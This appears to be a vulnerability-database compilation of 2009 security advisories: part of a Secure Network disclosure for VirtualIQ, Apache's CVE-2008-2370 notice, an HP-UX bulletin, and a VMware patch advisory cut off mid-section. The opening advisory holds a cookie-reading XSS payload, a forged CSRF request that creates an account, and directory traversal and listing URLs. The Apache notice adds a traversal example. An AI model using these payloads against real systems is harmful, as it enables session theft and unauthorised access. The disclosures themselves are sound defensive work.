userName=IQMANAGER&firstName=IQ&middleName=asd';
alert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&password=********&retypePassword=********&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1
(b) Cross-site request forgery (CSRF)
An attacker can perform different types of CSRF attacks against a logged user.
He can, for example, shutdown, start or restart an arbitrary
virtual machine, schedule new activities and so on.
The following HTTP request, if forged by the attacker and executed by the
victim while logged on VirtualIQ, creates an arbitrary user:
POST /tvserver/user/user.do?command=save&userId= HTTP/1.1
Host: server:9080
Cookie: JSESSIONID=[...]
userName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40asd.com&password=asd6&retypePassword=asd6&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1
(c) Web server vulnerabilities
VirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which
multiple public vulnerabilities have been released. As a
PoC, a directory traversal attack (CVE-2008-2938)
can be performed as:
http://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml
Listing of an arbitrary directory (CVE-2006-3835) can also be obtained with
the following PoC:
http://192.168.229.85:9080/tvserver/server/;index.jsp
(d) Information Leakage
Tomcat status page should be disabled or restricted, being accessible at:
http://status:9080/status
Username and password to access a VM through SSH are also available in clear
text in the configuration page.
Since an XSS vulnerability can also be triggered in the same page, an attacker
would also be able to easily capture the full credentials to access
the VM with a specially crafted XSS payload.
*** FIX INFORMATION ***
Upgrade to the latest version, at the moment 3.5 build 10.14.2009
*** WORKAROUNDS ***
--
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88
--
Claudio Criscione
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mob: +39 392 3389178
email: c.criscione@securenetwork.it
web: www.securenetwork.it
VAR-200808-0011 | CVE-2008-2370 |
Multiple PHP XML-RPC implementations vulnerable to code injection
Related entries in the VARIoT exploits database: VAR-E-200808-0268 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. Apache Tomcat is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server. Information obtained may lead to further attacks.
The following versions are affected:
Tomcat 4.1.0 through 4.1.37
Tomcat 5.5.0 through 5.5.26
Tomcat 6.0.0 through 6.0.16
Tomcat 3.x, 4.0.x, and 5.0.x may also be affected. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2008-2370: Apache Tomcat information disclosure vulnerability
Severity: Important
Vendor:
The Apache Software Foundation
Versions Affected:
Tomcat 4.1.0 to 4.1.37
Tomcat 5.5.0 to 5.5.26
Tomcat 6.0.0 to 6.0.16
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected
Description:
When using a RequestDispatcher the target path was normalised before the
query string was removed. A request that included a specially crafted
request parameter could be used to access content that would otherwise be
protected by a security constraint or by locating it in under the WEB-INF
directory.
Mitigation:
6.0.x users should upgrade to 6.0.18
5.5.x users should obtain the latest source from svn or apply this patch
which will be included from 5.5.27
http://svn.apache.org/viewvc?rev=680949&view=rev
4.1.x users should obtain the latest source from svn or apply this patch
which will be included from 4.1.38
http://svn.apache.org/viewvc?rev=680950&view=rev
Example:
For a page that contains:
<%
pageContext.forward("/page2.jsp?somepar=someval&par="+request.getParameter("blah"));
%>
an attacker can use:
http://host/page.jsp?blah=/../WEB-INF/web.xml
Credit:
This issue was discovered by Stefano Di Paola of Minded Security Research
Labs. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are contained in the Apache Web Server Suite.
References: CVE-2007-6420, CVE-2008-1232, CVE-2008-1947, CVE-2008-2364, CVE-2008-2370, CVE-2008-2938, CVE-2008-2939, CVE-2008-3658
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servelet Engine v5.5.27.01.01 or earlier
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
CVE-2007-6420 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1232 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1947 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2364 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2370 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2938 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2939 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-3658 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
URL: http://software.hp.com
Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
MANUAL ACTIONS: Yes - Update
Install Apache-based Web Server or Tomcat-based Servelet Engine from the Apache Web Server Suite v3.02 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
hpuxwsTOMCAT.TOMCAT
hpuxwsWEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.23
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.31
==================
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 2 February 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2009-0016
Synopsis: VMware vCenter and ESX update release and vMA patch
release address multiple security issue in third
party components
Issue date: 2009-11-20
Updated on: 2009-11-20 (initial release of advisory)
CVE numbers: --- JRE ---
CVE-2009-1093 CVE-2009-1094 CVE-2009-1095
CVE-2009-1096 CVE-2009-1097 CVE-2009-1098
CVE-2009-1099 CVE-2009-1100 CVE-2009-1101
CVE-2009-1102 CVE-2009-1103 CVE-2009-1104
CVE-2009-1105 CVE-2009-1106 CVE-2009-1107
CVE-2009-2625 CVE-2009-2670 CVE-2009-2671
CVE-2009-2672 CVE-2009-2673 CVE-2009-2675
CVE-2009-2676 CVE-2009-2716 CVE-2009-2718
CVE-2009-2719 CVE-2009-2720 CVE-2009-2721
CVE-2009-2722 CVE-2009-2723 CVE-2009-2724
--- Tomcat ---
CVE-2008-5515 CVE-2009-0033 CVE-2009-0580
CVE-2009-0781 CVE-2009-0783 CVE-2008-1232
CVE-2008-1947 CVE-2008-2370 CVE-2007-5333
CVE-2007-5342 CVE-2007-5461 CVE-2007-6286
CVE-2008-0002
--- ntp ---
CVE-2009-1252 CVE-2009-0159
--- kernel ---
CVE-2008-3528 CVE-2008-5700 CVE-2009-0028
CVE-2009-0269 CVE-2009-0322 CVE-2009-0675
CVE-2009-0676 CVE-2009-0778 CVE-2008-4307
CVE-2009-0834 CVE-2009-1337 CVE-2009-0787
CVE-2009-1336 CVE-2009-1439 CVE-2009-1633
CVE-2009-1072 CVE-2009-1630 CVE-2009-1192
CVE-2007-5966 CVE-2009-1385 CVE-2009-1388
CVE-2009-1389 CVE-2009-1895 CVE-2009-2406
CVE-2009-2407 CVE-2009-2692 CVE-2009-2698
CVE-2009-0745 CVE-2009-0746 CVE-2009-0747
CVE-2009-0748 CVE-2009-2847 CVE-2009-2848
--- python ---
CVE-2007-2052 CVE-2007-4965 CVE-2008-1721
CVE-2008-1887 CVE-2008-2315 CVE-2008-3142
CVE-2008-3143 CVE-2008-3144 CVE-2008-4864
CVE-2008-5031
--- bind ---
CVE-2009-0696
--- libxml and libxml2 ---
CVE-2009-2414 CVE-2009-2416
--- curl --
CVE-2009-2417
--- gnutil ---
CVE-2007-2052
- -----------------------------------------------------------------------
1. Summary
Updated Java JRE packages and Tomcat packages address several security
issues. Updates for the ESX Service Console and vMA include kernel,
ntp, Python, bind libxml, libxml2, curl and gnutil packages. ntp is
also updated for ESXi userworlds.
2. Relevant releases
vCenter Server 4.0 before Update 1
ESXi 4.0 without patch ESXi400-200911201-UG
ESX 4.0 without patches ESX400-200911201-UG, ESX400-200911223-UG,
ESX400-200911232-SG, ESX400-200911233-SG,
ESX400-200911234-SG, ESX400-200911235-SG,
ESX400-200911237-SG, ESX400-200911238-SG
vMA 4.0 before patch 02
3. Problem Description
a. JRE Security Update
JRE update to version 1.5.0_20, which addresses multiple security
issues that existed in earlier releases of JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,
CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,
CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows affected, patch pending
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
Player any any not affected
Server 2.0 any affected, patch pending
Server 1.0 any not affected
ACE any any not affected
Fusion any any not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911223-UG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 Patch 2 *
* vMA JRE is updated to version JRE 1.5.0_21
Notes: These vulnerabilities can be exploited remotely only if the
attacker has access to the Service Console network.
Security best practices provided by VMware recommend that the
Service Console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.
The currently installed version of JRE depends on your patch
deployment history.
b. Update Apache Tomcat version to 6.0.20
Update for VirtualCenter and ESX patch update the Tomcat package to
version 6.0.20 which addresses multiple security issues that existed
in the previous version of Apache Tomcat.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.20: CVE-2008-5515, CVE-2009-0033, CVE-2009-0580,
CVE-2009-0781, CVE-2009-0783.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.18: CVE-2008-1232, CVE-2008-1947, CVE-2008-2370.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.16: CVE-2007-5333, CVE-2007-5342, CVE-2007-5461,
CVE-2007-6286, CVE-2008-0002.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
======== ======== ======= =======================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows affected, patch pending
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
Player any any not affected
ACE any Windows not affected
Server 2.x any affected, patch pending
Server 1.x any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911223-UG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 not affected
Notes: These vulnerabilities can be exploited remotely only if the
attacker has access to the Service Console network.
Security best practices provided by VMware recommend that the
Service Console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.
The currently installed version of Tomcat depends on
your patch deployment history.
c. Third party library update for ntp.
The Network Time Protocol (NTP) is used to synchronize a computer's
time with a referenced time source.
ESXi 3.5 and ESXi 4.0 have a ntp client that is affected by the
following security issue. Note that the same security issue is
present in the ESX Service Console as described in section d. of
this advisory.
A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
authentication code. If ntpd was configured to use public key
cryptography for NTP packet authentication, a remote attacker could
use this flaw to send a specially-crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the
privileges of the "ntp" user.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1252 to this issue.
The NTP security issue identified by CVE-2009-0159 is not relevant
for ESXi 3.5 and ESXi 4.0.
The following table lists what action remediates the vulnerability
in this component (column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 4.0 ESXi ESXi400-200911201-UG
ESXi 3.5 ESXi affected, patch pending
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 not affected
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
d. Service Console update for ntp
Service Console package ntp updated to version ntp-4.2.2pl-9.el5_3.2
The Network Time Protocol (NTP) is used to synchronize a computer's
time with a referenced time source.
The Service Console present in ESX is affected by the following
security issues.
A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
authentication code. If ntpd was configured to use public key
cryptography for NTP packet authentication, a remote attacker could
use this flaw to send a specially-crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the
privileges of the "ntp" user.
NTP authentication is not enabled by default on the Service Console.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1252 to this issue.
A buffer overflow flaw was found in the ntpq diagnostic command. A
malicious, remote server could send a specially-crafted reply to an
ntpq request that could crash ntpq or, potentially, execute
arbitrary code with the privileges of the user running the ntpq
command.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-0159 to this issue.
The following table lists what action remediates the vulnerability
in the Service Console (column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911238-SG
ESX 3.5 ESX affected, patch pending **
ESX 3.0.3 ESX affected, patch pending **
ESX 2.5.5 ESX affected, patch pending **
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
** The service consoles of ESX 2.5.5, ESX 3.0.3 and ESX 3.5 are not
affected
by CVE-2009-1252. The security issue identified by CVE-2009-0159 has a
low impact on the service console of ESX 2.5.5, ESX 3.0.3 and ESX 3.5.
e. Updated Service Console package kernel
Updated Service Console package kernel addresses the security
issues below.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3528, CVE-2008-5700, CVE-2009-0028,
CVE-2009-0269, CVE-2009-0322, CVE-2009-0675, CVE-2009-0676,
CVE-2009-0778 to the security issues fixed in kernel
2.6.18-128.1.6.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-4307, CVE-2009-0834, CVE-2009-1337,
CVE-2009-0787, CVE-2009-1336 to the security issues fixed in
kernel 2.6.18-128.1.10.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-1439, CVE-2009-1633, CVE-2009-1072,
CVE-2009-1630, CVE-2009-1192 to the security issues fixed in
kernel 2.6.18-128.1.14.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-5966, CVE-2009-1385, CVE-2009-1388,
CVE-2009-1389, CVE-2009-1895, CVE-2009-2406, CVE-2009-2407 to the
security issues fixed in kernel 2.6.18-128.4.1.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2692, CVE-2009-2698 to the
security issues fixed in kernel 2.6.18-128.7.1.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-0745, CVE-2009-0746, CVE-2009-0747,
CVE-2009-0748, CVE-2009-2847, CVE-2009-2848 to the security issues
fixed in kernel 2.6.18-164.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911201-UG
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
ESX 2.5.5 ESX not applicable
vMA 4.0 RHEL5 Patch 2 **
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
** vMA is updated to kernel version 2.6.18-164.
f. Updated Service Console package python
Service Console package Python update to version 2.4.3-24.el5.
When the assert() system call was disabled, an input sanitization
flaw was revealed in the Python string object implementation that
led to a buffer overflow. The missing check for negative size values
meant the Python memory allocator could allocate less memory than
expected. This could result in arbitrary code execution with the
Python interpreter's privileges.
Multiple buffer and integer overflow flaws were found in the Python
Unicode string processing and in the Python Unicode and string
object implementations. An attacker could use these flaws to cause
a denial of service.
Multiple integer overflow flaws were found in the Python imageop
module. If a Python application used the imageop module to
process untrusted images, it could cause the application to
disclose sensitive information, crash or, potentially, execute
arbitrary code with the Python interpreter's privileges.
Multiple integer underflow and overflow flaws were found in the
Python snprintf() wrapper implementation. An attacker could use
these flaws to cause a denial of service (memory corruption).
Multiple integer overflow flaws were found in various Python
modules. An attacker could use these flaws to cause a denial of
service.
An integer signedness error, leading to a buffer overflow, was
found in the Python zlib extension module. If a Python application
requested the negative byte count be flushed for a decompression
stream, it could cause the application to crash or, potentially,
execute arbitrary code with the Python interpreter's privileges.
A flaw was discovered in the strxfrm() function of the Python
locale module. Strings generated by this function were not properly
NULL-terminated, which could possibly cause disclosure of data
stored in the memory of a Python application using this function.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-2052 CVE-2007-4965 CVE-2008-1721
CVE-2008-1887 CVE-2008-2315 CVE-2008-3142 CVE-2008-3143
CVE-2008-3144 CVE-2008-4864 CVE-2008-5031 to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911235-SG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX affected, patch pending
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
g. Updated Service Console package bind
Service Console package bind updated to version 9.3.6-4.P1.el5
The Berkeley Internet Name Domain (BIND) is an implementation of the
Domain Name System (DNS) protocols. BIND includes a DNS server
(named); a resolver library (routines for applications to use when
interfacing with DNS); and tools for verifying that the DNS server
is operating correctly.
A flaw was found in the way BIND handles dynamic update message
packets containing the "ANY" record type. A remote attacker could
use this flaw to send a specially-crafted dynamic update packet
that could cause named to exit with an assertion failure.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-0696 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911237-SG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX affected, patch pending
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
h. Updated Service Console package libxml2
Service Console package libxml2 updated to version 2.6.26-2.1.2.8.
libxml is a library for parsing and manipulating XML files. A
Document Type Definition (DTD) defines the legal syntax (and also
which elements can be used) for certain types of files, such as XML
files.
A stack overflow flaw was found in the way libxml processes the
root XML document element definition in a DTD. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.
Multiple use-after-free flaws were found in the way libxml parses
the Notation and Enumeration attribute types. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2414 and CVE-2009-2416 to these
issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911234-SG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX affected, patch pending
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
i. Updated Service Console package curl
Service Console package curl updated to version 7.15.5-2.1.el5_3.5
A cURL is affected by the previously published "null prefix attack",
caused by incorrect handling of NULL characters in X.509
certificates. If an attacker is able to get a carefully-crafted
certificate signed by a trusted Certificate Authority, the attacker
could use the certificate during a man-in-the-middle attack and
potentially confuse cURL into accepting it by mistake.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2417 to this issue
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911232-SG
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
j. Updated Service Console package gnutls
Service Console package gnutil updated to version 1.4.1-3.el5_3.5
A flaw was discovered in the way GnuTLS handles NULL characters in
certain fields of X.509 certificates. If an attacker is able to get
a carefully-crafted certificate signed by a Certificate Authority
trusted by an application using GnuTLS, the attacker could use the
certificate during a man-in-the-middle attack and potentially
confuse the application into accepting it by mistake.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2730 to this issue
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911233-SG
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the md5sum of your downloaded file.
VMware vCenter Server 4 Update 1
--------------------------------
Version 4.0 Update 1
Build Number 208156
Release Date 2009/11/19
Type Product Binaries
http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1
VMware vCenter Server 4 and modules
